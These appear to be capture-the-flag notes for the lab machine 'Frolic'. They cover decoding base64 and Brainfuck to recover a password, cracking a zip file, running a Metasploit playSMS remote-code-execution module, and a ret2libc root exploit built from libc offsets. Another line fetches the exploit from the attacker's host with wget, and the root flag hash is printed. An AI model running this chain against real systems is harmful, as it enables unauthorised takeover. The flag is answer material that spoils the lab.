- if ( username == "admin" && password == "superduperlooperpassword_lol"){
- DECODE
- DECODE
- DECODE BASE64 INTO A ZIP FILE
- USE FCRACKZIP TO CRACK THE ZIP FILE PASSWORD
- username = admin && password = superduperlooperpassword_lol
- DECODE BASE64
- KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
- KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
- K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
- LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
- DECODE BRAINFUCK ESOTERIC PROGRAMMING LANGUAGE
- +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
- ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
- <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
- ++..<
- idkwhatispass
- http://10.10.10.111:9999/playsms
- Login is admin
- pass is idkwhatispass
- Use Metasploit module exploit/multi/http/playsms_uploadcsv_exec
- Name       Current Setting                                                Required  Description
- ----       ---------------                                                --------  -----------
- PASSWORD   idkwhatispass                                                  yes       Password to authenticate with
- Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
- RHOST      10.10.10.111                                                   yes       The target address
- RPORT      9999                                                           yes       The target port (TCP)
- SSL        false                                                          no        Negotiate SSL/TLS for outgoing connections
- TARGETURI  /playsms/index.php?app=main&inc=feature_sendfromfile&op=list   yes       Base playsms directory path
- USERNAME   admin                                                          yes       Username to authenticate with
- VHOST                                                                     no        HTTP server virtual host
- RUN THIS COMMAND TO FIND LIBC ADDRESS
- GET SYSTEM OFFSET
- readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
- 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
- GET EXIT OFFSET
- readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
- 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
- GET ARGUMENT
- strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
- 15ba0b /bin/sh
- LIBC LOCATION
- ldd rop | grep libc
- libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
- DOWNLOAD EXPLOIT TO FROLIC
- python -m SimpleHTTPServer
- wget http://10.10.14.5:8000/ropExploit.py
- RUN EXPLOIT
- cd /home/ayush/.binary
- ./rop $(python /var/www/html/ropExploit.py)
- PWN ROOT
- cd root
- cat root.txt
- 85d3fdf03f969892538ba9a731826222